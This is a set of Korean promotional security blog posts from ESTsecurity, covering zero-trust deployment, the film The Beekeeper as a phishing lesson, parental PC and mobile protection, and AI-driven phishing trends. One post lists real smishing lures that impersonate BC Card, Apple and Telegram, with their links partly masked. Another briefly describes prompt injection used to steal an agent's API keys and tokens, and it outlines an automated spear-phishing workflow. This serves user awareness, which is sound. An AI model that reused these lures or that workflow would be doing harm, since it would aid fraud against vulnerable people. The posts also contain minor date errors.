단순 인증이 아닌, 접근 이후 행위까지 관리 가능한 체계 필요

B 고객사는 제로트러스트를 특정 보안 솔루션 하나로 해결하기보다, 접근–인증–행위–탐지까지 하나의 흐름으로 연결하는 구조를 선택했습니다.

✅ 구축 핵심 포인트

FIDO2 기반 MFA 적용

클라우드 및 가상 환경에서 핵심 작업 수행 시, 사용자 인증 단계부터 강화하여 계정 탈취 위험을 최소화

DaaS 환경 단말 무결성 강화 및 실시간 모니터링

사용자의 단말 상태와 악성코드 감염 여부를 지속적으로 확인해, 위험 단말의 접근을 선제적으로 통제

SPA 기반 인증 이후 SDP·MS를 통한 접근 인가

외부 접근 시 인증된 사용자만 서비스 자원에 접근하도록 설계하고, 접근 범위를 최소 단위로 세분화

XDR 기반 통합 탐지·모니터링 연계

사용자 접근, 데이터 이용, 행위 정보를 통합 분석해 이상 징후를 빠르게 식별하고 대응 가능하도록 구성

이 모든 흐름을 하나의 정책 체계로 연결한 것이 알약 ZePP 기반 제로트러스트 통합 보안 구조입니다.

✅ 도입 효과 - '접속을 허용하는 보안'에서 '상태를 관리하는 보안'으로

B 고객사는 이번 구축을 통해 다음과 같은 변화를 경험하고 있습니다.

서비스 고객 도입망 환경에서 사용자 접근 관리 체계가 명확해짐
DaaS 및 클라우드 환경 전반의 보안 상태를 지속적으로 점검할 수 있는 운영 구조 확보
다수 고객을 대상으로 하는 서비스 환경에서도 안정적인 보안 운영 기반 마련

특히 단순히 ‘누가 접속했는지’를 확인하는 수준을 넘어, 어떤 상태의 단말이, 어떤 행위로 서비스 자원에 접근하는지를 지속적으로 관리할 수 있게 되었다는 점이 가장 큰 변화입니다.

서비스형 IT 환경에서 제로트러스트가 중요한 이유

최근 보안 사고의 상당수는 외부 침입 이후, 내부에서 정상 계정과 권한을 활용해 확산됩니다. 서비스 기업일수록 이러한 사고는 단일 시스템 문제가 아니라 비즈니스 신뢰 전체를 흔드는 리스크로 이어질 수 있습니다.

알약 ZePP는 제로트러스트를 단순한 개념이나 유행어가 아닌, 실제 서비스 운영 환경에 적용 가능한 보안 구조로 구현합니다.

제로트러스트, 이제는 ‘검토’가 아니라 ‘적용’의 단계!

다수 고객을 상대하는 서비스 환경, DaaS·클라우드 기반 업무 구조, 외부 접속이 일상화된 IT 환경이라면 이제 보안의 기준도 달라져야 합니다.

알약 ZePP는 접속을 허용하는 보안이 아니라, 접속 이후까지 검증하고 관리하는 제로트러스트 보안을 제공합니다.

제로트러스트는 더 이상 새로운 개념이 아니라, 실제 운영 환경에서 적용 여부를 고민해야 할 보안의 기준이 되고 있습니다. 특히 다수 고객을 상대하는 서비스 환경에서는 ‘접속을 막는 보안’이 아닌, 접속 이후까지 지속적으로 검증하고 통제할 수 있는 구조가 필수적입니다.

알약 ZePP는 서비스 고객 도입망 환경에 맞춰, 사용자·단말·접근 행위 전반을 하나의 흐름으로 관리하는 제로트러스트 통합 보안 플랫폼입니다. 실제 운영 환경에서 검증된 구축 사례를 통해, 복잡한 IT 환경에서도 현실적인 보안 기준을 제시합니다.

서비스 환경에 최적화된 제로트러스트 보안 적용이 고민되신다면,

아래 도입 상담을 통해 우리 조직에 맞는 적용 방안을 확인해 보시기 바랍니다!

[영화 속 보안 이야기] 인생을 무너뜨리는 모바일 피싱의 위험성, 현실에서는 어떻게 막을까?

알약5 — Fri, 9 Jan 2026 14:10:59 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

보이스피싱·스미싱과 같은 모바일 피싱 범죄는 더 이상 특정 연령이나 일부 사람들만의 문제가 아닙니다. 택배 안내, 금융 알림, 취업 제안, 지인 사칭 메시지까지. 너무도 익숙한 일상의 메시지 하나가 가족의 삶 전체를 뒤흔드는 사례가 계속해서 발생하고 있습니다.

특히 문제는, 이러한 피해가 가족 중 ‘가장 보안에 취약한 사람’을 통해 시작되는 경우가 많다는 점입니다. 스마트폰 사용에 익숙하지 않은 부모님, 새로운 앱과 링크에 대한 경계심이 낮은 고령층, 혹은 아직 보안 개념이 충분히 자리 잡지 않은 자녀까지. 한 사람의 실수가 가족 전체의 피해로 이어지는 구조가 이미 현실이 되었습니다.

이러한 현실을 매우 직관적으로 보여주는 작품이 바로 영화 비키퍼(The Beekeeper, 2004)입니다. 통쾌한 액션 영화로 알려져 있지만, 그 중심에는 우리가 매일 마주하는 모바일 피싱과 데이터 범죄의 위험성이 자리하고 있습니다.

[이미지]The Beekeeper, 2024

한 번의 실수로 시작된 이야기, 피싱 피해의 시작

영화 The Beekeeper는 매우 현실적인 사건으로 시작됩니다.

은퇴한 교사 엘로이즈는 피싱 범죄에 속아 자신이 관리자로 있던 자선 기금의 보유금 200만 달러를 송금하게 되고, 동시에 개인 자산까지 모두 빼앗기며 파산에 이릅니다. 평생을 성실히 살아온 교사였고, 지역 사회를 위해 자선 기금을 관리하던 인물이었지만, 단 한 번의 피싱 피해로 모든 것을 잃은 끝에 극단적인 선택을 하게 됩니다.

엘로이즈의 농장에 세입자로 살고 있던 양봉가 '애덤 클레이'(제이슨 스타뎀)은 이 비극을 목격합니다. 그는 엘로이즈가 단순히 돈을 잃은 것이 아니라, 자신이 책임지고 있던 역할과 존엄까지 함께 무너졌다는 사실에 분노하고, 정의를 구현하기로 결심합니다.

[이미지]The Beekeeper, 2024

애덤은 과거 자신이 몸담았던 비밀 조직 ‘비키퍼스(Beekeepers)’에 연락합니다. 비키퍼스는 인간 정보 기밀에 특화된 조직으로, 정부의 관할권조차 초월하는 권한을 가지고 미국을 보호해 온 존재입니다. 전직 비키퍼스 요원이었던 애덤은 이 조직을 통해 얻은 정보와 네트워크를 활용해, 전 세계에서 콜센터 조직을 운영하며 대규모 신용 사기를 벌이고 있는 데릭 댄포스를 추적하기 시작합니다.

영화는 이후, 개인정보를 무기로 삼아 사람들의 자산과 삶을 파괴하는 거대한 피싱 산업의 실체를 하나씩 드러내며 전개됩니다.

영화 속 설정이 현실과 닮아 있는 이유

이 영화의 서사가 특히 날카로운 지점은, 피해자가 ‘관리자’였다는 설정입니다.

엘로이즈는 단순한 개인 피해자가 아닙니다. 그녀는 자선 기금의 관리자였고, 타인의 돈과 신뢰를 책임지고 있던 사람이었습니다. 즉, 피싱 범죄는 그녀 개인의 자산뿐 아니라 그녀가 관리하던 공동체의 자산과 신뢰까지 동시에 파괴한 것입니다.

이러한 구조는 현실에서도 반복됩니다. 예를들어 부모님이 동호회 회비를 관리하고 있을 수도 있고, 가족 중 누군가는 작은 사업체의 회계나 단체 계좌를 담당하고 있을 수 있습니다. 회사에서 관리자 권한을 가진 스마트폰, 공용 인증서가 저장된 기기 역시 마찬가지입니다.

피싱 범죄는 더 이상 ‘개인만 노리는 범죄’가 아닙니다. 관리자 역할을 맡은 사람, 책임이 집중된 사람, 그리고 디지털 보안에 상대적으로 취약한 사람이 가장 먼저 표적이 됩니다.

영화 속 엘로이즈가 노려진 이유는 분명합니다.

신뢰를 기반으로 살아온 사람
경계심이 낮은 환경
한 번의 판단으로 큰 금액을 움직일 수 있는 위치

이 조건은 현실에서 많은 부모님 세대와도 겹칩니다. 문제는, 이러한 위험이 발생해도 자녀나 가족은 사건이 터진 뒤에야 알게 된다는 점입니다. 영화 속에서도 엘로이즈의 피해는 사후에야 주변 사람들에게 알려집니다. 이미 돌이킬 수 없는 상태가 된 뒤였습니다.

“만약 누군가 엘로이즈의 스마트폰에서
위험 신호를 먼저 알아챘다면?”

영화 속 애덤은 직접 추적하고 응징합니다.

그러나 현실에서는 그런 선택지가 존재하지 않습니다. 대신 우리가 할 수 있는 것은 단 하나입니다. 문제가 벌어지기 ‘이전’에 가족의 위험을 알아차리는 것입니다.

부모님의 스마트폰에서 스미싱 문자가 탐지되는 순간,

관리자로 등록된 가족에게 즉시 알림이 전달된다면,

악성 앱이 설치되는 즉시 경고를 받고 조치할 수 있다면,

현실에서는 영화 속 엘로이즈와 다른 결말을 맞을 수 있을 것입니다.

혼자 조심해서는 더이상 막을 수 없는 모바일 피싱

영화 The Beekeeper가 던지는 메시지는 명확합니다. 피싱 범죄는 개인의 부주의 문제가 아니라, 구조적인 위협이며, 그 피해는 개인을 넘어 가족과 공동체로 확장된다는 점입니다.

현실에서 우리는 비밀 조직도, 초법적 권한도 가질 수 없습니다.

하지만 최소한, 가족의 스마트폰을 함께 지켜보는 구조는 만들 수 있습니다.

과거에는 '조심하면 된다', '링크만 누르지 않으면 된다'는 말이 통했을지 모릅니다. 그러나 최근의 모바일 피싱은 다음과 같은 특징을 보입니다.

정상 메시지와 구분하기 어려운 자연스러운 문장
가족·지인·기관을 정교하게 사칭
스미싱 링크 + 악성 앱 설치까지 이어지는 다단계 공격
자동화·AI 기반 문구 생성으로 빠르게 확산

이제는 개인의 주의력만으로 모든 위협을 차단하기 어렵습니다. 특히 부모님이나 자녀의 스마트폰을 항상 옆에서 직접 확인해 줄 수 없는 상황이라면, 사후 대응은 이미 늦은 경우가 많습니다.

그러므로 지금 필요한 보안의 방향은 ‘개인 보호’를 넘어, 가족 전체를 함께 지키는 보안입니다.

가족의 스마트폰을 한 번에 지키는 보안 - 알약 패밀리케어

이스트시큐리티의 알약 모바일 패밀리케어는 개인 단말 보호에 머무르지 않고, 가족 구성원의 스마트폰 보안 상태를 함께 관리할 수 있는 가족형 보안 서비스입니다.

알약 모바일 패밀리케어는 다음과 같은 방식으로 가족의 디지털 안전을 지켜줍니다.

부모님·자녀 등 가족 구성원의 기기를 연결해 대표 1인이 통합 관리
가족의 스마트폰에서 스미싱·피싱·악성 앱이 탐지되면 관리자에게 즉시 알림 전송
AI 기반 분석을 통해 의심 메시지와 위험 앱을 사전에 탐지
보안에 취약한 가족 구성원을 대신해 빠르게 상황을 인지하고 대응 가능

즉, 문제가 발생한 뒤 알려주는 보안이 아니라, 가족 중 누군가 위험에 노출되는 순간을 먼저 알려주는 보안입니다.

영화는 끝나도, 가족을 노리는 공격은 계속됩니다

영화는 통쾌한 결말로 마무리되지만, 현실의 피싱 범죄는 지금 이 순간에도 계속되고 있습니다. '택배 도착', '계좌 확인', '지원 결과 안내'라는 메시지를 부모님이 받고 있을지도 모릅니다. 스마트폰이 곧 지갑이자 신분증, 금융 창구가 된 시대. 모바일 보안은 더 이상 개인의 선택 문제가 아니라 가족을 위한 책임이 되고 있습니다.

단 한 통의 메시지가 우리 가족의 일상을 무너뜨리지 않도록, 알약 모바일 패밀리케어로 지금 우리 가족의 스마트폰 보안을 함께 점검해 보시기 바랍니다. 모바일 피싱, 더 이상 영화 속 이야기가 아닙니다. 알약 패밀리케어는 개인을 넘어, 가족의 디지털 안전까지 함께 지켜드립니다. (지금 다운로드)

[Web발신] 비씨카드님이 보낸 등기 4078_**_88*를 오늘 배달예정(보관장소 별도 신청)

알약4 — Fri, 9 Jan 2026 11:31:56 +0900

[1월 둘째주]

No.	문자내용
1	[Web발신] 비씨카드님이 보낸 등기 4078_**_88*를 오늘 배달예정(보관장소 별도 신청)
2	[국제발신] [Applel 귀하의 Apple ID가 다른 지역에서 로그인되고 있습니다. 즉시 확인하십시오. ap****m-kr.com
3	[국외발신] [Apple] 귀하의 App Sotre에서 이상지출이 발생했습니다. 즉시 확인해 주세요. app-***r.com
4	[국제발신] Telegram 인증만료 계정 인증 통해 활성화 하세요. https://ar.ee/t**p

출처 : 알약M
기간 : 2026년 1월 2일 ~ 2025년 1월 9일

부모님 PC 보안도 걱정 끝! 알약 3.0으로 쉽고 안전하게 관리하는 법

알약5 — Wed, 7 Jan 2026 10:54:57 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

부모님께서 '컴퓨터가 갑자기 느려졌다', '이상한 창이 계속 뜬다'는 말을 하신 적 있으신가요? 직접 가서 확인해 드리기 어려운 상황에서는 정확한 원인을 파악하기도, 어떻게 조치해야 할지 설명드리기도 쉽지 않습니다. 이런 불편은 단순히 PC 사용이 익숙하지 않아서라기보다, 최근 보안 위협이 점점 더 교묘해지고 있기 때문에 발생합니다.

AI 활용

왜 부모님 PC는 보안 위협에 더 취약할까?

부모님 PC의 문제는 위협을 정상 화면과 구분하기 어렵다는 점에서 시작됩니다. 최근 악성코드는 정상 프로그램이나 안내 화면을 그대로 흉내 내 판단 실수를 유도하는 방식으로 진화하고 있습니다.

1) 광고창·경고창의 진위 구분 어려움

악성 팝업이 정상 프로그램처럼 보이는 경우 증가
‘닫기(X)’처럼 위장된 버튼 클릭으로 감염 발생

2) 무료 프로그램 설치 시 번들 프로그램 감염

체크박스 해제를 놓치면 광고 프로그램·스파이웨어 자동 설치
설치 과정이 복잡해 부모님 세대가 실수하기 쉬움

3) 링크·페이지 위험성 판단의 어려움

검색 광고, 문자 메시지 링크, 이메일 첨부파일 등 겉으로 안전해 보이는 경로를 통해 감염
정상처럼 보이는 사이트에도 악성 스크립트 가능

4) USB·외장하드 사용 빈도 높음

감염된 USB 하나만 연결해도 악성코드가 PC 전체에 확산
부모님 세대의 파일 이동 방식과 맞물려 위험성 증가

정기적인 검사·업데이트가 이루어지지 않는 경우가 많아 감염을 늦게 발견하고 피해가 커지기 쉬운 구조입니다.

알약 3.0, 부모님 PC를 위한 ‘쉽고 강력한 보안’

알약 3.0은 복잡한 보안 기능을 최대한 쉽게 사용할 수 있도록 직관적인 UI, 자동화된 관리, 실시간 보호를 중심으로 설계된 PC 백신입니다.

더 쉬운 보안, 더 간편한 사용으로

알약이 보안을 책임집니다.

1) 한눈에 보이는 보안 상태 표시 UI

컬러와 아이콘, 알약 캐릭터의 표정 변화를 통해 현재 PC 상태를 직관적으로 확인할 수 있습니다.

초록·노랑·빨강 컬러로 위험도를 즉시 파악하고, 필요한 조치를 한 문장으로 안내해 복잡한 판단 없이도 현재 상태를 이해할 수 있습니다.

초록/노랑/빨강 컬러로 즉각적인 위험 판단
캐릭터 표정 변화로 상태를 직관적으로 전달
필요한 조치를 한 문장으로 안내

사용자는 복잡한 지식 없이도 지금 PC가 안전한지 바로 파악할 수 있습니다.

2) 설치 즉시 시작되는 자동 보호

알약 3.0은 설치만 하면 실시간 감시, 정기 검사, USB 자동 검사 등 기본 보호 기능이 자동으로 작동합니다.

[자동 실행 기능]

실시간 감시
정기 검사
USB 자동 검사

또한 최신 보안 위협에 대응하기 위해 엔진 및 패턴 업데이트가 자동으로 이루어져, 별도로 업데이트를 신경 쓰지 않아도 항상 최신 보호 상태를 유지할 수 있습니다.

3) PC 사용을 방해하지 않는 백그라운드 보호

보안 프로그램이 PC를 느리게 만든다는 인식을 줄이기 위해, 알약 3.0은 검사와 보호 과정을 백그라운드에서 효율적으로 수행합니다.

검사 중에도 PC 사용에 부담을 주지 않도록 최적화
화면 멈춤, 과도한 알림 최소화
필요한 순간에만 안내 제공

검사 중에도 일상적인 PC 사용에 부담을 주지 않으며, 꼭 필요한 순간에만 알림을 제공해 사용 흐름을 방해하지 않습니다.

4) 위협 발생 순간을 놓치지 않는 실시간 감시

실시간 감시는 PC 사용 중 발생하는 주요 위협 행위를 실시간으로 감시합니다. 파일 다운로드, 프로그램 설치, 링크 클릭 등 PC 사용 중 발생하는 주요 위협 행위를 실시간으로 감시하고, 악성 행위가 감지되면 즉시 차단합니다.

다운로드·설치·링크 클릭 순간에 위험 여부 판단
악성 행위는 즉시 차단
위험 상황에서는 사용자가 헷갈리지 않도록 권장되는 조치를 중심으로 안내
판단 실수로 이어지는 클릭을 크게 감소

위험 상황에서는 사용자가 헷갈리지 않도록 권장되는 조치를 중심으로 안내해, 판단 실수로 이어질 수 있는 클릭을 줄여줍니다. 이렇게 알약 3.0은 가장 취약한 ‘순간’을 정확히 잡아내어 부모님 PC를 안전하게 보호합니다.

5) 랜섬웨어 사전 차단으로 소중한 파일 보호

알약 3.0은 랜섬웨어의 비정상적인 행위를 조기에 감지해 파일 암호화가 진행되기 전에 공격을 차단합니다.

중요 문서와 파일을 노리는 랜섬웨어 위협으로부터 PC를 보호해, 갑작스러운 데이터 손실 위험을 최소화합니다.

6) 숨은 위협까지 잡아내는 듀얼 탐지 엔진

알약 3.0은 자체 탐지 엔진과 글로벌 보안 엔진을 함께 활용한 듀얼 엔진 구조로, 단일 엔진으로 놓치기 쉬운 위협까지 탐지합니다.

[탐지 효과]

백그라운드에서 몰래 설치되는 광고 프로그램·스파이웨어 차단
숨겨진 설치 프로세스 감시
악성 행위 확인 시 즉시 중단
PC 느려짐·원치 않는 광고창 발생 예방

겉으로는 정상처럼 보이지만 백그라운드에서 실행되는 광고 프로그램이나 스파이웨어도 탐지·차단해 PC 느려짐과 원치 않는 광고 발생을 예방합니다.

7) USB 연결 즉시 감염 차단 — USB Auto Scan

부모님 세대에서 특히 많이 발생하는 USB 감염을 해결하기 위해 기본 기능으로 제공됩니다. USB·외장하드 연결 시 자동으로 검사를 실행해, 이동식 저장장치를 통한 악성코드 유입을 사전에 차단합니다.

[자동 검사 프로세스]

USB·외장하드 연결 즉시 검사 시작
악성 파일은 자동 차단·자동 치료
별도 조작 없이 사용 가능

별도의 조작 없이 자동으로 검사·치료가 이루어져 USB 사용 빈도가 높은 환경에서도 안심하고 사용할 수 있습니다.

부모님 PC 보안, 알약 3.0이면 충분합니다!

복잡한 설정 없이 설치만 하면 자동으로 보호가 시작되고, 한눈에 보이는 UI와 실시간 감시, 랜섬웨어 사전 차단, 자동 업데이트까지.

부모님이 불편함 없이 PC를 사용할 수 있도록 설계된 ‘국민 백신’ 알약 3.0으로,

부모님 PC 보안을 지금 바로 점검해보세요!

AX 시대, Arm 기반 클라우드 보안의 새로운 기준을 만들다! - 이스트시큐리티·엑세스랩 MOU 소식

알약5 — Tue, 6 Jan 2026 10:00:33 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

AI와 클라우드 기술이 빠르게 고도화되며 기업 IT 환경은 그 어느 때보다 복잡해지고 있습니다. 특히 AX(AI Transformation) 시대를 맞아, AI·클라우드 인프라 전반을 안정적으로 보호할 수 있는 차세대 보안 기술에 대한 요구도 함께 높아지고 있습니다. 이러한 흐름 속에서 이스트시큐리티는 Arm 서버 기술 선도기업인 엑세스랩과 손잡고, Arm 기반 클라우드 보안 기술 공동 개발을 위한 전략적 업무 협약(MOU)을 체결했습니다.

이번 협약은 지난 1월 5일, 서울 서초구 이스트시큐리티 본사에서 진행되었으며, 이스트시큐리티 김병훈 CTO와 엑세스랩 유명환 대표가 참석해 양사 간 기술 협력의 방향성과 비전을 공유했습니다.

[사진] 김병훈 이스트시큐리티 CTO와 유명환 엑세스랩 대표

AX 시대, Arm 기반 클라우드 보안을 위한 전략적 협력

이번 협업의 핵심은 Arm 아키텍처 기반 인프라 환경에서 동작하는 다양한 AX 워크로드를 포괄적으로 보호하는 프라이빗 클라우드 특화 보안 기술 개발입니다. 물리 서버와 가상 머신은 물론, 컨테이너 환경, AI·LLM 추론 노드까지 포함한 복합적인 클라우드 워크로드를 하나의 보안 체계로 관리·보호하는 것이 목표입니다.

양사는 이를 위해 워크로드 취약점 탐지, 실시간 위협 모니터링, 사용자·권한 관리 고도화, 트러스트 기반 보안 정책 강화, 규제 준수 및 컴플라이언스 자동화 등 클라우드 보안의 핵심 요소를 중심으로 기술 협력을 본격화할 계획입니다. 점점 복잡해지는 클라우드 환경에서도 보안 사각지대를 최소화하고, 선제적인 위협 대응이 가능한 체계를 구축하는 데 초점을 맞추고 있습니다.

알약 엔진 기반, Arm 아키텍처 최적화 보안 기술 고도화

이스트시큐리티는 이번 협업을 통해 자사의 핵심 보안 자산인 ‘알약’ 백신 엔진을 중심으로, 엔드포인트·클라우드·워크로드 보안 기술과 위협 인텔리전스 역량을 Arm 아키텍처에 최적화해 나갈 방침입니다. 특히 국내 환경에 특화된 탐지 기술과 축적된 보안 노하우를 바탕으로, 글로벌 솔루션과 차별화된 클라우드 보안 경쟁력을 강화해 나갈 계획입니다.

엑세스랩 역시 20년간 축적해 온 임베디드 및 풀스택 엔터프라이즈 컴퓨팅 기술을 기반으로, Arm 서버 마더보드 설계·제조부터 펌웨어, 클러스터 운영 소프트웨어까지 전 영역에서 확보한 기술력을 이번 협업에 적극 활용합니다. 보안 플랫폼과 연계된 인프라·운영 데이터를 제공하고, 실환경에 최적화된 통합 보안 솔루션을 공동으로 선보인다는 구상입니다.

클라우드 보안 전반으로 확장되는 공동 사업

양사는 향후 프라이빗 클라우드 사용자 권한 관리(CIEM), Arm 기반 보안 제품 포팅, 산업·공공·교육 분야를 아우르는 공동 프로젝트 추진 등 클라우드 보안 전반에 걸친 협력을 단계적으로 확대해 나갈 예정입니다.

프라이빗 클라우드 사용자 권한 관리(CIEM)
Arm 기반 보안 제품 포팅
산업·공공·교육 분야 공동 프로젝트 추진

단순 기술 협력을 넘어, 실제 고객 환경에서 활용 가능한 통합 보안 모델을 구축하는 것이 이번 MOU의 중요한 목표입니다.

엑세스랩 측은 “이번 협업을 통해 Arm 기반 인프라와 보안 기술이 유기적으로 결합된 새로운 클라우드 보안 모델을 제시하겠다”며 “고객과 파트너가 신뢰할 수 있는 안정적인 AX 환경 구축에 최선을 다하겠다”고 밝혔습니다.

이스트시큐리티 김병훈 CTO는 “이번 협업은 오픈 이노베이션의 범위를 클라우드·AI 인프라 영역까지 확장하는 중요한 계기”라며 “양사의 상호 보완적인 기술 통합을 통해 차세대 클라우드 보안 생태계 구축에 기여하고, 국내외 고객에게 더욱 견고한 보안 서비스를 제공해 나가겠다”고 전했습니다.

국민 백신 ‘알약’을 기반으로 국내 엔드포인트 보안 시장을 선도해 온 이스트시큐리티는, 이번 협력을 계기로 클라우드와 워크로드 보안 영역까지 기술적 저변을 더욱 확장해 나가고 있습니다. AX 시대에 요구되는 새로운 보안 기준을 제시하며, 변화하는 IT 환경 속에서도 신뢰할 수 있는 보안 파트너로 자리매김해 나가겠습니다.

피싱 공격의 진화, 다음 타깃은 우리 가족일 수 있습니다

알약5 — Wed, 31 Dec 2025 09:30:12 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

2025년 들어 AI 기술이 빠르게 확산되면서 피싱 공격 역시 과거와는 전혀 다른 양상으로 진화하고 있습니다. 이메일을 넘어 문자(SMS), 메신저, SNS, 가짜 앱 등 다양한 채널을 통해 정교한 사회공학 기법이 동원되고 있으며, 공격의 속도와 정밀도 또한 눈에 띄게 향상되고 있습니다. 실제로 DeepStrike가 발표한 2025년 보고서에 따르면 AI 기반 피싱·사칭형 공격은 전년 대비 1,265% 증가했으며, 이에 따른 사용자 피해 규모 역시 지속적으로 확대되고 있는 것으로 나타났습니다.

이번 콘텐츠에서는 AI 시대에 특히 주목해야 할 주요 피싱 위협이 어떻게 변화하고 있는지, 그리고 개인과 가족이 실생활에서 적용할 수 있는 대응 전략은 무엇인지 차근차근 살펴보고자 합니다. 빠르게 고도화되는 보안 환경 속에서 위협의 흐름을 이해하고 선제적으로 대비하는 것이 무엇보다 중요해지고 있습니다.

AI가 만든 새로운 피싱 공격 트렌드

현재 고도화되고 있는 피싱 공격 방식은 크게 세 가지 흐름으로 정리할 수 있습니다.

프롬프트 인젝션과 NHI 탈취 - MFA까지 우회하는 신종 피싱 공격 방식

AI 에이전트가 기업과 개인의 업무 자동화를 지원하는 동시에, 공격자들은 이제 사람의 계정보다 AI가 가진 디지털 신원, 즉 NHI(Non-Human Identity)를 주요 공격 대상으로 삼고 있습니다. 프롬프트 인젝션 공격은 단순히 AI 모델을 오작동시키는 수준을 넘어, LLM이 접근 가능한 API 키나 서비스 계정, 정적 토큰을 탈취해 내부 시스템으로 직접 침투하는 방식으로 진화하고 있습니다.

[표] NHI 탈취형 공격과 기존 공격의 차이

AT&T를 포함한 글로벌 기업들의 AI 보안 사례에서도 이러한 AI 에이전트 및 자동화 계정에 과도한 권한이 부여된 구조가 핵심 위험 요인으로 반복해서 지적되고 있습니다. 특히 NHI는 비밀번호나 MFA 인증 없이 API 키나 토큰만으로 접근하는 경우가 많아, 한 번 탈취될 경우 기존 사용자 계정보다 더 빠르고 광범위하게 권한이 악용될 수 있습니다.

이처럼 NHI를 노린 공격은 앞으로 모든 보안 체계에서 반드시 고려해야 할 핵심 위협으로 평가되고 있습니다.

AI 기반 스피어피싱 자동화 - LLM이 만든 초정밀 피싱의 등장

생성형 AI는 스피어피싱 공격의 효율성과 성공률을 획기적으로 끌어올리고 있습니다. 과거에는 공격자가 직접 타깃을 조사하고 문구를 작성해야 했다면, 이제 LLM은 공개 프로필과 최근 활동, 직무 정보, 관심사 등을 분석해 피해자가 속기 쉬운 메시지를 자동으로 생성할 수 있습니다.

ZeroThreat를 비롯한 다수의 보안 업체 분석에 따르면, LLM이 생성한 피싱 메일은 기존 규칙·시그니처 기반 필터를 우회해 실제 받은편지함까지 도달하는 비율이 크게 증가한 것으로 나타났습니다. 문장의 자연스러움과 문맥 정확도가 높아지면서, 사용자 스스로 피싱 여부를 판단하기가 점점 더 어려워지고 있다는 점도 공통적으로 지적되고 있습니다.

✔ 스피어피싱 자동화 흐름

공개 데이터 수집 (SNS, 블로그, 기업 홈페이지 등 오픈 소스 정보)
LLM이 문체·관심사·직무 정보를 분석해 타깃 프로파일링 수행
개인 맞춤형 피싱 메시지·첨부 파일·링크 자동 생성
자동 전송 및 반복 테스트를 통해 클릭률 극대화

특히 기업 사칭 이메일은 내부 문서 스타일과 서명, 직함, 커뮤니케이션 톤까지 모방해 더 큰 피해로 이어지는 사례가 늘고 있습니다.

딥페이크·음성 사기 급증 - Fake Voice가 계정 탈취에 사용되는 방식

딥페이크 음성·영상 기술의 발전은 피싱 공격을 단순한 링크 클릭 유도 수준을 넘어, 실시간 계정 탈취나 송금 사기로까지 확장시키고 있습니다. Pindrop의 2025 Voice Intelligence & Security Report에 따르면 딥페이크 및 synthetic voice 기반 사기는 일부 산업에서 수년 사이 1,300% 이상 증가한 것으로 나타났으며, 콜센터를 중심으로 AI 음성 사기가 빠르게 확산되고 있음을 보여줍니다.

또한 Signicat, Keepnet Labs 등의 조사에서는 딥페이크 기반 사기가 전체 사기 시도 중 약 6.5%를 차지할 만큼 비중이 확대된 것으로 분석됐으며, ZeroThreat 역시 이러한 흐름을 인용해 AI 사기 위협의 심각성을 강조하고 있습니다. 실제로 CEO의 음성을 합성해 긴급 송금을 요구하거나, 화상 회의나 인증 절차에서 딥페이크 영상을 활용해 신뢰를 속이는 사례도 국내외에서 잇따라 보고되고 있습니다.

[이미지] AI 활용 딥페이크 기술

✔ 딥페이크 의심 신호 체크리스트

음성이 지나치게 깨끗하거나 감정 변화가 일정함
영상 속 얼굴 움직임·입 모양이 미세하게 어긋나거나 부자연스러움
급박한 결정을 요구하면서 추가적인 검증(콜백, 메일 재확인 등)을 회피함

AI 딥페이크 기반 공격은 이제 단순한 피싱을 넘어 조직과 개인 간 신뢰 체계 자체를 흔드는 위협으로 진화하고 있습니다.

AI 피싱 시대, 가족 단위 보안이 필요한 이유

AI 시대의 피싱은 더 이상 링크 클릭만을 노리는 공격이 아니라, 계정과 앱, 시스템 권한 자체를 직접 겨냥하는 형태로 빠르게 진화하고 있습니다. 공격 속도와 정교함이 높아지면서 사용자의 주의만으로 모든 위협을 막기에는 한계가 분명해졌고, 사람이 인지하기 전에 보안 시스템이 먼저 차단해주는 구조가 필수가 되고 있습니다.

특히 가족이 하나의 디지털 환경으로 연결된 상황에서는 한 명의 노출이 전체 피해로 확산되기 쉽습니다. 스미싱이나 가짜 앱에 상대적으로 취약한 부모님 세대까지 고려하면, 가족이 함께 관리하고 위험 알림을 공유할 수 있는 보안 방식의 중요성은 더욱 커지고 있습니다. 이러한 흐름 속에서 ‘가족 단위 보안’은 선택이 아닌, AI 시대에 필요한 현실적인 대응 방식으로 자리 잡고 있습니다.

알약 모바일 패밀리케어

알약 모바일 앱의 패밀리케어는 AI 기반 스미싱 분석과 가족 보호 기능을 강화한 모바일 보안 서비스로, 고도화되는 AI 피싱 환경에서 맞춤형 스미싱 패턴에 대응할 수 있도록 설계되었습니다.

스미싱 메시지를 높은 정확도로 탐지하며, 가족 최대 4대까지 통합 보안 관리가 가능합니다. 부모님의 휴대폰에서 위험 징후가 감지될 경우 자녀 단말로 실시간 알림을 제공해, 가족 전체의 대응 속도를 높입니다.

주요기능

- Google Cloud 기반 Vertex AI 및 Gemini 모델을 활용한 문자 분석 엔진 적용
- 스미싱 메시지를 높은 정확도로 탐지하는 AI 기반 필터링 기능 제공
- 가족 4대까지 통합 보안 관리 지원
- 부모님 휴대폰에서 위험 징후가 감지될 경우, 자녀 단말로 실시간 알림 제공

가족 모두가 꼭 기억해야 할 보안 수칙 7가지

자동으로 위협을 차단하는 보안 기능과 함께, 일상 속 기본 보안 습관을 병행하는 것도 중요합니다.

작은 보안 습관 하나가 큰 피해를 막을 수 있습니다. AI 기반 위협이 빠르게 확산되는 지금, 우리 가족의 스마트폰이 노출된다면 그 피해를 누구도 장담할 수 없습니다. 스미싱 문자 한 통, 가짜 앱 하나만으로도 사진과 메시지, 계정 정보까지 악용될 수 있는 시대입니다.

모바일 보안은 이제 선택이 아니라 필수입니다. 지금 바로 알약을 무료로 다운로드하고, 패밀리케어로 AI 기반 실시간 보호를 직접 경험해 보세요. 우리 가족의 스마트폰을 지키는 첫걸음은, 바로 이 버튼 클릭에서 시작됩니다.

[참고출처]

DeepStrike – Phishing Statistics 2025, AI Cyber Attack Statistics 2025, AI Cybersecurity Threats 2025.
Deloitte / AT&T 사례 – A no-nonsense approach to secure AI enablement at AT&T.
학술·기술 자료 – AI agents 및 NHI 보안 위협 관련 설문·연구
ZeroThreat – Deepfake Attacks & AI-Generated Phishing: 2025 Statistics
StrongestLayer 및 기타 – AI-Generated Phishing 위협 및 필터 우회 관련 분석.
Pindrop – 2025 Voice Intelligence & Security Report 및 Deepfake fraud 관련 기사
